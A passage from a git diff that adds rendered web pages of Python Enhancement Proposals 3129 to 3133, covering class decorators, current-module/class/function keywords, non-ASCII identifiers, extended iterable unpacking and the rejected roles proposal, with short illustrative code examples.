The motivating use-case was to make certain constructs more easily +expressed and less reliant on implementation details of the CPython +interpreter. While it is possible to express class decorator-like +functionality using metaclasses, the results are generally +unpleasant and the implementation highly fragile [2]. In +addition, metaclasses are inherited, whereas class decorators are not, +making metaclasses unsuitable for some, single class-specific uses of +class decorators. The fact that large-scale Python projects like Zope +were going through these wild contortions to achieve something like +class decorators won over the BDFL.

+
+
+

Semantics

+

The semantics and design goals of class decorators are the same as +for function decorators (PEP 318, PEP 318); +the only +difference is that you’re decorating a class instead of a function. +The following two snippets are semantically identical:

+
class A:
+  pass
+A = foo(bar(A))
+
+
+@foo
+@bar
+class A:
+  pass
+
+
+

For a detailed examination of decorators, please refer to PEP 318.

+
+
+

Implementation

+

Adapting Python’s grammar to support class decorators requires +modifying two rules and adding a new rule:

+
funcdef: [decorators] 'def' NAME parameters ['->' test] ':' suite
+
+compound_stmt: if_stmt | while_stmt | for_stmt | try_stmt |
+               with_stmt | funcdef | classdef
+
+
+

need to be changed to

+
decorated: decorators (classdef | funcdef)
+
+funcdef: 'def' NAME parameters ['->' test] ':' suite
+
+compound_stmt: if_stmt | while_stmt | for_stmt | try_stmt |
+               with_stmt | funcdef | classdef | decorated
+
+
+

Adding decorated is necessary to avoid an ambiguity in the +grammar.

+

The Python AST and bytecode must be modified accordingly.

+

A reference implementation [3] has been provided by +Jack Diederich.

+
+
+

Acceptance

+

There was virtually no discussion following the posting of this PEP, +meaning that everyone agreed it should be accepted.

+

The patch was committed to Subversion as revision 55430.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3129.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3130/index.html b/pep-3130/index.html new file mode 100644 index 00000000000..7eb0c0506b4 --- /dev/null +++ b/pep-3130/index.html @@ -0,0 +1,331 @@ + + + + + + + + PEP 3130 – Access to Current Module/Class/Function | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3130 – Access to Current Module/Class/Function

+
+
Author:
+
Jim J. Jewett <jimjjewett at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
22-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+
22-Apr-2007
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected. It is not clear how it should be +implemented or what the precise semantics should be in edge cases, +and there aren’t enough important use cases given. response has +been lukewarm at best.

+
+
+

Abstract

+

It is common to need a reference to the current module, class, +or function, but there is currently no entirely correct way to +do this. This PEP proposes adding the keywords __module__, +__class__, and __function__.

+
+
+

Rationale for __module__

+

Many modules export various functions, classes, and other objects, +but will perform additional activities (such as running unit +tests) when run as a script. The current idiom is to test whether +the module’s name has been set to magic value.

+
if __name__ == "__main__": ...
+
+
+

More complicated introspection requires a module to (attempt to) +import itself. If importing the expected name actually produces +a different module, there is no good workaround.

+
# __import__ lets you use a variable, but... it gets more
+# complicated if the module is in a package.
+__import__(__name__)
+
+# So just go to sys modules... and hope that the module wasn't
+# hidden/removed (perhaps for security), that __name__ wasn't
+# changed, and definitely hope that no other module with the
+# same name is now available.
+class X(object):
+    pass
+
+import sys
+mod = sys.modules[__name__]
+mod = sys.modules[X.__class__.__module__]
+
+
+

Proposal: Add a __module__ keyword which refers to the module +currently being defined (executed). (But see open issues.)

+
# XXX sys.main is still changing as draft progresses.  May
+# really need sys.modules[sys.main]
+if __module__ is sys.main:    # assumes PEP (3122), Cannon
+    ...
+
+
+
+
+

Rationale for __class__

+

Class methods are passed the current instance; from this they can +determine self.__class__ (or cls, for class methods). +Unfortunately, this reference is to the object’s actual class, +which may be a subclass of the defining class. The current +workaround is to repeat the name of the class, and assume that the +name will not be rebound.

+
class C(B):
+
+    def meth(self):
+        super(C, self).meth() # Hope C is never rebound.
+
+class D(C):
+
+    def meth(self):
+        # ?!? issubclass(D,C), so it "works":
+        super(C, self).meth()
+
+
+

Proposal: Add a __class__ keyword which refers to the class +currently being defined (executed). (But see open issues.)

+
class C(B):
+    def meth(self):
+        super(__class__, self).meth()
+
+
+

Note that super calls may be further simplified by the “New Super” +PEP (Spealman). The __class__ (or __this_class__) attribute came +up in attempts to simplify the explanation and/or implementation +of that PEP, but was separated out as an independent decision.

+

Note that __class__ (or __this_class__) is not quite the same as +the __thisclass__ property on bound super objects. The existing +super.__thisclass__ property refers to the class from which the +Method Resolution Order search begins. In the above class D, it +would refer to (the current reference of name) C.

+
+
+

Rationale for __function__

+

Functions (including methods) often want access to themselves, +usually for a private storage location or true recursion. While +there are several workarounds, all have their drawbacks.

+
def counter(_total=[0]):
+    # _total shouldn't really appear in the
+    # signature at all; the list wrapping and
+    # [0] unwrapping obscure the code
+    _total[0] += 1
+    return _total[0]
+
+@annotate(total=0)
+def counter():
+    # Assume name counter is never rebound:
+    counter.total += 1
+    return counter.total
+
+# class exists only to provide storage:
+class _wrap(object):
+
+    __total = 0
+
+    def f(self):
+        self.__total += 1
+        return self.__total
+
+# set module attribute to a bound method:
+accum = _wrap().f
+
+# This function calls "factorial", which should be itself --
+# but the same programming styles that use heavy recursion
+# often have a greater willingness to rebind function names.
+def factorial(n):
+    return (n * factorial(n-1) if n else 1)
+
+
+

Proposal: Add a __function__ keyword which refers to the function +(or method) currently being defined (executed). (But see open +issues.)

+
@annotate(total=0)
+def counter():
+    # Always refers to this function obj:
+    __function__.total += 1
+    return __function__.total
+
+def factorial(n):
+    return (n * __function__(n-1) if n else 1)
+
+
+
+
+

Backwards Compatibility

+

While a user could be using these names already, double-underscore +names ( __anything__ ) are explicitly reserved to the interpreter. +It is therefore acceptable to introduce special meaning to these +names within a single feature release.

+
+
+

Implementation

+

Ideally, these names would be keywords treated specially by the +bytecode compiler.

+

Guido has suggested [1] using a cell variable filled in by the +metaclass.

+

Michele Simionato has provided a prototype using bytecode hacks [2]. +This does not require any new bytecode operators; it just +modifies the which specific sequence of existing operators gets +run.

+
+
+

Open Issues

+
    +
  • Are __module__, __class__, and __function__ the right names? In +particular, should the names include the word “this”, either as +__this_module__, __this_class__, and __this_function__, (format +discussed on the python-3000 and python-ideas lists) or as +__thismodule__, __thisclass__, and __thisfunction__ (inspired +by, but conflicting with, current usage of super.``__thisclass__``).
  • +
  • Are all three keywords needed, or should this enhancement be +limited to a subset of the objects? Should methods be treated +separately from other functions?
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3130.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3131/index.html b/pep-3131/index.html new file mode 100644 index 00000000000..83ccafa0985 --- /dev/null +++ b/pep-3131/index.html @@ -0,0 +1,369 @@ + + + + + + + + PEP 3131 – Supporting Non-ASCII Identifiers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3131 – Supporting Non-ASCII Identifiers

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-May-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP suggests to support non-ASCII letters (such as accented characters, +Cyrillic, Greek, Kanji, etc.) in Python identifiers.

+
+
+

Rationale

+

Python code is written by many people in the world who are not +familiar with the English language, or even well-acquainted with the +Latin writing system. Such developers often desire to define classes +and functions with names in their native languages, rather than having +to come up with an (often incorrect) English translation of the +concept they want to name. By using identifiers in their native +language, code clarity and maintainability of the code among +speakers of that language improves.

+

For some languages, common transliteration systems exist (in particular, for the +Latin-based writing systems). For other languages, users have larger +difficulties to use Latin to write their native words.

+
+
+

Common Objections

+

Some objections are often raised against proposals similar to this one.

+

People claim that they will not be able to use a library if to do so they have +to use characters they cannot type on their keyboards. However, it is the +choice of the designer of the library to decide on various constraints for using +the library: people may not be able to use the library because they cannot get +physical access to the source code (because it is not published), or because +licensing prohibits usage, or because the documentation is in a language they +cannot understand. A developer wishing to make a library widely available needs +to make a number of explicit choices (such as publication, licensing, language +of documentation, and language of identifiers). It should always be the choice +of the author to make these decisions - not the choice of the language +designers.

+

In particular, projects wishing to have wide usage probably might want to +establish a policy that all identifiers, comments, and documentation is written +in English (see the GNU coding style guide for an example of such a policy). +Restricting the language to ASCII-only identifiers does not enforce comments and +documentation to be English, or the identifiers actually to be English words, so +an additional policy is necessary, anyway.

+
+
+

Specification of Language Changes

+

The syntax of identifiers in Python will be based on the Unicode standard annex +UAX-31 [1], with elaboration and changes as defined below.

+

Within the ASCII range (U+0001..U+007F), the valid characters for identifiers +are the same as in Python 2.5. This specification only introduces additional +characters from outside the ASCII range. For other characters, the +classification uses the version of the Unicode Character Database as included in +the unicodedata module.

+

The identifier syntax is <XID_Start> <XID_Continue>*.

+

The exact specification of what characters have the XID_Start or +XID_Continue properties can be found in the DerivedCoreProperties +file of the Unicode data in use by Python (4.1 at the time this +PEP was written), see [6]. For reference, the construction rules +for these sets are given below. The XID_* properties are derived +from ID_Start/ID_Continue, which are derived themselves.

+

ID_Start is defined as all characters having one of the general +categories uppercase letters (Lu), lowercase letters (Ll), titlecase +letters (Lt), modifier letters (Lm), other letters (Lo), letter +numbers (Nl), the underscore, and characters carrying the +Other_ID_Start property. XID_Start then closes this set under +normalization, by removing all characters whose NFKC normalization +is not of the form ID_Start ID_Continue* anymore.

+

ID_Continue is defined as all characters in ID_Start, plus +nonspacing marks (Mn), spacing combining marks (Mc), decimal number +(Nd), connector punctuations (Pc), and characters carrying the +Other_ID_Continue property. Again, XID_Continue closes this set +under NFKC-normalization; it also adds U+00B7 to support Catalan.

+

All identifiers are converted into the normal form NFKC while parsing; +comparison of identifiers is based on NFKC.

+

A non-normative HTML file listing all valid identifier characters for +Unicode 4.1 can be found at +http://www.dcl.hpi.uni-potsdam.de/home/loewis/table-3131.html.

+
+
+

Policy Specification

+

As an addition to the Python Coding style, the following policy is +prescribed: All identifiers in the Python standard library MUST use +ASCII-only identifiers, and SHOULD use English words wherever feasible +(in many cases, abbreviations and technical terms are used which +aren’t English). In addition, string literals and comments must also +be in ASCII. The only exceptions are (a) test cases testing the +non-ASCII features, and (b) names of authors. Authors whose names are +not based on the Latin alphabet MUST provide a Latin transliteration +of their names.

+

As an option, this specification can be applied to Python 2.x. In +that case, ASCII-only identifiers would continue to be represented as +byte string objects in namespace dictionaries; identifiers with +non-ASCII characters would be represented as Unicode strings.

+
+
+

Implementation

+

The following changes will need to be made to the parser:

+
    +
  1. If a non-ASCII character is found in the UTF-8 representation of +the source code, a forward scan is made to find the first ASCII +non-identifier character (e.g. a space or punctuation character)
  2. +
  3. The entire UTF-8 string is passed to a function to normalize the +string to NFKC, and then verify that it follows the identifier +syntax. No such callout is made for pure-ASCII identifiers, which +continue to be parsed the way they are today. The Unicode database +must start including the Other_ID_{Start|Continue} property.
  4. +
  5. If this specification is implemented for 2.x, reflective libraries +(such as pydoc) must be verified to continue to work when Unicode +strings appear in __dict__ slots as keys.
  6. +
+
+
+

Open Issues

+

John Nagle suggested consideration of Unicode Technical Standard #39, +[2], which discusses security mechanisms for Unicode identifiers. +It’s not clear how that can precisely apply to this PEP; possible +consequences are

+
    +
  • warn about characters listed as “restricted” in xidmodifications.txt
  • +
  • warn about identifiers using mixed scripts
  • +
  • somehow perform Confusable Detection
  • +
+

In the latter two approaches, it’s not clear how precisely the +algorithm should work. For mixed scripts, certain kinds of mixing +should probably allowed - are these the “Common” and “Inherited” +scripts mentioned in section 5? For Confusable Detection, it seems one +needs two identifiers to compare them for confusion - is it possible +to somehow apply it to a single identifier only, and warn?

+

In follow-up discussion, it turns out that John Nagle actually +meant to suggest UTR#36, level “Highly Restrictive”, [3].

+

Several people suggested to allow and ignore formatting control +characters (general category Cf), as is done in Java, JavaScript, and +C#. It’s not clear whether this would improve things (it might +for RTL languages); if there is a need, these can be added +later.

+

Some people would like to see an option on selecting support +for this PEP at run-time; opinions vary on what precisely +that option should be, and what precisely its default value +should be. Guido van Rossum commented in [5] that a global +flag passed to the interpreter is not acceptable, as it would +apply to all modules.

+
+
+

Discussion

+

Ka-Ping Yee summarizes discussion and further objection +in [4] as such:

+
    +
  1. Should identifiers be allowed to contain any Unicode letter?

    Drawbacks of allowing non-ASCII identifiers wholesale:

    +
      +
    1. Python will lose the ability to make a reliable round trip to +a human-readable display on screen or on paper.
    2. +
    3. Python will become vulnerable to a new class of security exploits; +code and submitted patches will be much harder to inspect.
    4. +
    5. Humans will no longer be able to validate Python syntax.
    6. +
    7. Unicode is young; its problems are not yet well understood and +solved; tool support is weak.
    8. +
    9. Languages with non-ASCII identifiers use different character sets +and normalization schemes; PEP 3131’s choices are non-obvious.
    10. +
    11. The Unicode bidi algorithm yields an extremely confusing display +order for RTL text when digits or operators are nearby.
    12. +
    +
  2. +
  3. Should the default behaviour accept only ASCII identifiers, or +should it accept identifiers containing non-ASCII characters?

    Arguments for ASCII only by default:

    +
      +
    1. Non-ASCII identifiers by default makes common practice/assumptions +subtly/unknowingly wrong; rarely wrong is worse than obviously wrong.
    2. +
    3. Better to raise a warning than to fail silently when encountering +a probably unexpected situation.
    4. +
    5. All of current usage is ASCII-only; the vast majority of future +usage will be ASCII-only.
    6. +
    +
      +
    1. It is the pockets of Unicode adoption that are parochial, not the +ASCII advocates.
    2. +
    3. Python should audit for ASCII-only identifiers for the same +reasons that it audits for tab-space consistency
    4. +
    5. Incremental change is safer.
    6. +
    7. An ASCII-only default favors open-source development and sharing +of source code.
    8. +
    9. Existing projects won’t have to waste any brainpower worrying +about the implications of Unicode identifiers.
    10. +
    +
  4. +
  5. Should non-ASCII identifiers be optional?

    Various voices in support of a flag (although there’s been debate +over which should be the default, no one seems to be saying that +there shouldn’t be an off switch)

    +
  6. +
  7. Should the identifier character set be configurable?

    Various voices proposing and supporting a selectable character set, +so that users can get all the benefits of using their own language +without the drawbacks of confusable/unfamiliar characters

    +
  8. +
  9. Which identifier characters should be allowed?
      +
    1. What to do about bidi format control characters?
    2. +
    3. What about other ID_Continue characters? What about characters +that look like punctuation? What about other recommendations +in UTS #39? What about mixed-script identifiers?
    4. +
    +
  10. +
  11. Which normalization form should be used, NFC or NFKC?
  12. +
  13. Should source code be required to be in normalized form?
  14. +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3131.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3132/index.html b/pep-3132/index.html new file mode 100644 index 00000000000..22858c9fa5d --- /dev/null +++ b/pep-3132/index.html @@ -0,0 +1,310 @@ + + + + + + + + PEP 3132 – Extended Iterable Unpacking | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3132 – Extended Iterable Unpacking

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a change to iterable unpacking syntax, allowing to +specify a “catch-all” name which will be assigned a list of all items +not assigned to a “regular” name.

+

An example says more than a thousand words:

+
>>> a, *b, c = range(5)
+>>> a
+0
+>>> c
+4
+>>> b
+[1, 2, 3]
+
+
+
+
+

Rationale

+

Many algorithms require splitting a sequence in a “first, rest” pair. +With the new syntax,

+
first, rest = seq[0], seq[1:]
+
+
+

is replaced by the cleaner and probably more efficient:

+
first, *rest = seq
+
+
+

For more complex unpacking patterns, the new syntax looks even +cleaner, and the clumsy index handling is not necessary anymore.

+

Also, if the right-hand value is not a list, but an iterable, it +has to be converted to a list before being able to do slicing; to +avoid creating this temporary list, one has to resort to

+
it = iter(seq)
+first = it.next()
+rest = list(it)
+
+
+
+
+

Specification

+

A tuple (or list) on the left side of a simple assignment (unpacking +is not defined for augmented assignment) may contain at most one +expression prepended with a single asterisk (which is henceforth +called a “starred” expression, while the other expressions in the +list are called “mandatory”). This designates a subexpression that +will be assigned a list of all items from the iterable being unpacked +that are not assigned to any of the mandatory expressions, or an +empty list if there are no such items.

+

For example, if seq is a sliceable sequence, all the following +assignments are equivalent if seq has at least two elements:

+
a, b, c = seq[0], list(seq[1:-1]), seq[-1]
+a, *b, c = seq
+[a, *b, c] = seq
+
+
+

It is an error (as it is currently) if the iterable doesn’t contain +enough items to assign to all the mandatory expressions.

+

It is also an error to use the starred expression as a lone +assignment target, as in

+
*a = range(5)
+
+
+

This, however, is valid syntax:

+
*a, = range(5)
+
+
+

Note that this proposal also applies to tuples in implicit assignment +context, such as in a for statement:

+
for a, *b in [(1, 2, 3), (4, 5, 6, 7)]:
+    print(b)
+
+
+

would print out

+
[2, 3]
+[5, 6, 7]
+
+
+

Starred expressions are only allowed as assignment targets, using them +anywhere else (except for star-args in function calls, of course) is an +error.

+
+
+

Implementation

+
+

Grammar change

+

This feature requires a new grammar rule:

+
star_expr: ['*'] expr
+
+
+

In these two rules, expr is changed to star_expr:

+
comparison: star_expr (comp_op star_expr)*
+exprlist: star_expr (',' star_expr)* [',']
+
+
+
+
+

Changes to the Compiler

+

A new ASDL expression type Starred is added which represents a +starred expression. Note that the starred expression element +introduced here is universal and could later be used for other +purposes in non-assignment context, such as the yield *iterable +proposal.

+

The compiler is changed to recognize all cases where a starred +expression is invalid and flag them with syntax errors.

+

A new bytecode instruction, UNPACK_EX, is added, whose argument +has the number of mandatory targets before the starred target in the +lower 8 bits and the number of mandatory targets after the starred +target in the upper 8 bits. For unpacking sequences without starred +expressions, the old UNPACK_ITERABLE opcode is kept.

+
+
+

Changes to the Bytecode Interpreter

+

The function unpack_iterable() in ceval.c is changed to handle +the extended unpacking, via an argcntafter parameter. In the +UNPACK_EX case, the function will do the following:

+
    +
  • collect all items for mandatory targets before the starred one
  • +
  • collect all remaining items from the iterable in a list
  • +
  • pop items for mandatory targets after the starred one from the list
  • +
  • push the single items and the resized list on the stack
  • +
+

Shortcuts for unpacking iterables of known types, such as lists or +tuples, can be added.

+

The current implementation can be found at the SourceForge Patch +tracker [SFPATCH]. It now includes a minimal test case.

+
+
+
+

Acceptance

+

After a short discussion on the python-3000 list [1], the PEP was +accepted by Guido in its current form. Possible changes discussed +were:

+
    +
  • Only allow a starred expression as the last item in the exprlist. +This would simplify the unpacking code a bit and allow for the +starred expression to be assigned an iterator. This behavior was +rejected because it would be too surprising.
  • +
  • Try to give the starred target the same type as the source +iterable, for example, b in a, *b = 'hello' would be +assigned the string 'ello'. This may seem nice, but is +impossible to get right consistently with all iterables.
  • +
  • Make the starred target a tuple instead of a list. This would be +consistent with a function’s *args, but make further processing +of the result harder.
  • +
+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3132.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3133/index.html b/pep-3133/index.html new file mode 100644 index 00000000000..6eeb65f6bbf --- /dev/null +++ b/pep-3133/index.html @@ -0,0 +1,682 @@ + + + + + + + + PEP 3133 – Introducing Roles | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3133 – Introducing Roles

+
+
Author:
+
Collin Winter <collinwinter at google.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
3115, 3129
+
Created:
+
01-May-2007
+
Python-Version:
+
3.0
+
Post-History:
+
13-May-2007
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has helped push PEP 3119 towards a saner, more minimalistic +approach. But given the latest version of PEP 3119 I much prefer +that. GvR.

+
+
+

Abstract

+

Python’s existing object model organizes objects according to their +implementation. It is often desirable – especially in +duck typing-based language like Python – to organize objects by +the part they play in a larger system (their intent), rather than by +how they fulfill that part (their implementation). This PEP +introduces the concept of roles, a mechanism for organizing +objects according to their intent rather than their implementation.

+
+
+

Rationale

+

In the beginning were objects. They allowed programmers to marry +function and state, and to increase code reusability through concepts +like polymorphism and inheritance, and lo, it was good. There came +a time, however, when inheritance and polymorphism weren’t enough. +With the invention of both dogs and trees, we were no longer able to +be content with knowing merely, “Does it understand ‘bark’?” +We now needed to know what a given object thought that “bark” meant.

+

One solution, the one detailed here, is that of roles, a mechanism +orthogonal and complementary to the traditional class/instance system. +Whereas classes concern themselves with state and implementation, the +roles mechanism deals exclusively with the behaviours embodied in a +given class.

+

This system was originally called “traits” and implemented for Squeak +Smalltalk [4]. It has since been adapted for use in +Perl 6 [3] where it is called “roles”, and it is primarily +from there that the concept is now being interpreted for Python 3. +Python 3 will preserve the name “roles”.

+

In a nutshell: roles tell you what an object does, classes tell you +how an object does it.

+

In this PEP, I will outline a system for Python 3 that will make it +possible to easily determine whether a given object’s understanding +of “bark” is tree-like or dog-like. (There might also be more +serious examples.)

+
+

A Note on Syntax

+

A syntax proposals in this PEP are tentative and should be +considered to be strawmen. The necessary bits that this PEP depends +on – namely PEP 3115’s class definition syntax and PEP 3129’s class +decorators – are still being formalized and may change. Function +names will, of course, be subject to lengthy bikeshedding debates.

+
+
+
+

Performing Your Role

+
+

Static Role Assignment

+

Let’s start out by defining Tree and Dog classes

+
class Tree(Vegetable):
+
+  def bark(self):
+    return self.is_rough()
+
+
+class Dog(Animal):
+
+  def bark(self):
+    return self.goes_ruff()
+
+
+

While both implement a bark() method with the same signature, +they do wildly different things. We need some way of differentiating +what we’re expecting. Relying on inheritance and a simple +isinstance() test will limit code reuse and/or force any dog-like +classes to inherit from Dog, whether or not that makes sense. +Let’s see if roles can help.

+
@perform_role(Doglike)
+class Dog(Animal):
+  ...
+
+@perform_role(Treelike)
+class Tree(Vegetable):
+  ...
+
+@perform_role(SitThere)
+class Rock(Mineral):
+  ...
+
+
+

We use class decorators from PEP 3129 to associate a particular role +or roles with a class. Client code can now verify that an incoming +object performs the Doglike role, allowing it to handle Wolf, +LaughingHyena and Aibo [1] instances, too.

+

Roles can be composed via normal inheritance:

+
@perform_role(Guard, MummysLittleDarling)
+class GermanShepherd(Dog):
+
+  def guard(self, the_precious):
+    while True:
+      if intruder_near(the_precious):
+        self.growl()
+
+  def get_petted(self):
+    self.swallow_pride()
+
+
+

Here, GermanShepherd instances perform three roles: Guard and +MummysLittleDarling are applied directly, whereas Doglike +is inherited from Dog.

+
+
+

Assigning Roles at Runtime

+

Roles can be assigned at runtime, too, by unpacking the syntactic +sugar provided by decorators.

+

Say we import a Robot class from another module, and since we +know that Robot already implements our Guard interface, +we’d like it to play nicely with guard-related code, too.

+
>>> perform(Guard)(Robot)
+
+
+

This takes effect immediately and impacts all instances of Robot.

+
+
+

Asking Questions About Roles

+

Just because we’ve told our robot army that they’re guards, we’d +like to check in on them occasionally and make sure they’re still at +their task.

+
>>> performs(our_robot, Guard)
+True
+
+
+

What about that one robot over there?

+
>>> performs(that_robot_over_there, Guard)
+True
+
+
+

The performs() function is used to ask if a given object +fulfills a given role. It cannot be used, however, to ask a +class if its instances fulfill a role:

+
>>> performs(Robot, Guard)
+False
+
+
+

This is because the Robot class is not interchangeable +with a Robot instance.

+
+
+
+

Defining New Roles

+
+

Empty Roles

+

Roles are defined like a normal class, but use the Role +metaclass.

+
class Doglike(metaclass=Role):
+  ...
+
+
+

Metaclasses are used to indicate that Doglike is a Role in +the same way 5 is an int and tuple is a type.

+
+
+

Composing Roles via Inheritance

+

Roles may inherit from other roles; this has the effect of composing +them. Here, instances of Dog will perform both the +Doglike and FourLegs roles.

+
class FourLegs(metaclass=Role):
+  pass
+
+class Doglike(FourLegs, Carnivor):
+  pass
+
+@perform_role(Doglike)
+class Dog(Mammal):
+  pass
+
+
+
+
+

Requiring Concrete Methods

+

So far we’ve only defined empty roles – not very useful things. +Let’s now require that all classes that claim to fulfill the +Doglike role define a bark() method:

+
class Doglike(FourLegs):
+
+  def bark(self):
+    pass
+
+
+

No decorators are required to flag the method as “abstract”, and the +method will never be called, meaning whatever code it contains (if any) +is irrelevant. Roles provide only abstract methods; concrete +default implementations are left to other, better-suited mechanisms +like mixins.

+

Once you have defined a role, and a class has claimed to perform that +role, it is essential that that claim be verified. Here, the +programmer has misspelled one of the methods required by the role.

+
@perform_role(FourLegs)
+class Horse(Mammal):
+
+  def run_like_teh_wind(self)
+    ...
+
+
+

This will cause the role system to raise an exception, complaining +that you’re missing a run_like_the_wind() method. The role +system carries out these checks as soon as a class is flagged as +performing a given role.

+

Concrete methods are required to match exactly the signature demanded +by the role. Here, we’ve attempted to fulfill our role by defining a +concrete version of bark(), but we’ve missed the mark a bit.

+
@perform_role(Doglike)
+class Coyote(Mammal):
+
+  def bark(self, target=moon):
+    pass
+
+
+

This method’s signature doesn’t match exactly with what the +Doglike role was expecting, so the role system will throw a bit +of a tantrum.

+
+
+
+

Mechanism

+

The following are strawman proposals for how roles might be expressed +in Python. The examples here are phrased in a way that the roles +mechanism may be implemented without changing the Python interpreter. +(Examples adapted from an article on Perl 6 roles by Curtis Poe +[2].)

+
    +
  1. Static class role assignment
    @perform_role(Thieving)
    +class Elf(Character):
    +  ...
    +
    +
    +

    perform_role() accepts multiple arguments, such that this is +also legal:

    +
    @perform_role(Thieving, Spying, Archer)
    +class Elf(Character):
    +  ...
    +
    +
    +

    The Elf class now performs both the Thieving, Spying, +and Archer roles.

    +
  2. +
  3. Querying instances
    if performs(my_elf, Thieving):
    +  ...
    +
    +
    +

    The second argument to performs() may also be anything with a +__contains__() method, meaning the following is legal:

    +
    if performs(my_elf, set([Thieving, Spying, BoyScout])):
    +  ...
    +
    +
    +

    Like isinstance(), the object needs only to perform a single +role out of the set in order for the expression to be true.

    +
  4. +
+
+
+

Relationship to Abstract Base Classes

+

Early drafts of this PEP [5] envisioned roles as competing +with the abstract base classes proposed in PEP 3119. After further +discussion and deliberation, a compromise and a delegation of +responsibilities and use-cases has been worked out as follows:

+
    +
  • Roles provide a way of indicating an object’s semantics and abstract +capabilities. A role may define abstract methods, but only as a +way of delineating an interface through which a particular set of +semantics are accessed. An Ordering role might require that +some set of ordering operators be defined.
    class Ordering(metaclass=Role):
    +  def __ge__(self, other):
    +    pass
    +
    +  def __le__(self, other):
    +    pass
    +
    +  def __ne__(self, other):
    +    pass
    +
    +  # ...and so on
    +
    +
    +

    In this way, we’re able to indicate an object’s role or function +within a larger system without constraining or concerning ourselves +with a particular implementation.

    +
  • +
  • Abstract base classes, by contrast, are a way of reusing common, +discrete units of implementation. For example, one might define an +OrderingMixin that implements several ordering operators in +terms of other operators.
    class OrderingMixin:
    +  def __ge__(self, other):
    +    return self > other or self == other
    +
    +  def __le__(self, other):
    +    return self < other or self == other
    +
    +  def __ne__(self, other):
    +    return not self == other
    +
    +  # ...and so on
    +
    +
    +

    Using this abstract base class - more properly, a concrete +mixin - allows a programmer to define a limited set of operators +and let the mixin in effect “derive” the others.

    +
  • +
+

By combining these two orthogonal systems, we’re able to both +a) provide functionality, and b) alert consumer systems to the +presence and availability of this functionality. For example, +since the OrderingMixin class above satisfies the interface +and semantics expressed in the Ordering role, we say the mixin +performs the role:

+
@perform_role(Ordering)
+class OrderingMixin:
+  def __ge__(self, other):
+    return self > other or self == other
+
+  def __le__(self, other):
+    return self < other or self == other
+
+  def __ne__(self, other):
+    return not self == other
+
+  # ...and so on
+
+
+

Now, any class that uses the mixin will automatically – that is, +without further programmer effort – be tagged as performing the +Ordering role.

+

The separation of concerns into two distinct, orthogonal systems +is desirable because it allows us to use each one separately. +Take, for example, a third-party package providing a +RecursiveHash role that indicates a container takes its +contents into account when determining its hash value. Since +Python’s built-in tuple and frozenset classes follow this +semantic, the RecursiveHash role can be applied to them.

+
>>> perform_role(RecursiveHash)(tuple)
+>>> perform_role(RecursiveHash)(frozenset)
+
+
+

Now, any code that consumes RecursiveHash objects will now be +able to consume tuples and frozensets.

+
+
+

Open Issues

+
+

Allowing Instances to Perform Different Roles Than Their Class

+

Perl 6 allows instances to perform different roles than their class. +These changes are local to the single instance and do not affect +other instances of the class. For example:

+
my_elf = Elf()
+my_elf.goes_on_quest()
+my_elf.becomes_evil()
+now_performs(my_elf, Thieving) # Only this one elf is a thief
+my_elf.steals(["purses", "candy", "kisses"])
+
+
+

In Perl 6, this is done by creating an anonymous class that +inherits from the instance’s original parent and performs the +additional role(s). This is possible in Python 3, though whether it +is desirable is still is another matter.

+

Inclusion of this feature would, of course, make it much easier to +express the works of Charles Dickens in Python:

+
>>> from literature import role, BildungsRoman
+>>> from dickens import Urchin, Gentleman
+>>>
+>>> with BildungsRoman() as OliverTwist:
+...   mr_brownlow = Gentleman()
+...   oliver, artful_dodger = Urchin(), Urchin()
+...   now_performs(artful_dodger, [role.Thief, role.Scoundrel])
+...
+...   oliver.has_adventures_with(ArtfulDodger)
+...   mr_brownlow.adopt_orphan(oliver)
+...   now_performs(oliver, role.RichWard)
+
+
+
+
+

Requiring Attributes

+

Neal Norwitz has requested the ability to make assertions about +the presence of attributes using the same mechanism used to require +methods. Since roles take effect at class definition-time, and +since the vast majority of attributes are defined at runtime by a +class’s __init__() method, there doesn’t seem to be a good way +to check for attributes at the same time as methods.

+

It may still be desirable to include non-enforced attributes in the +role definition, if only for documentation purposes.

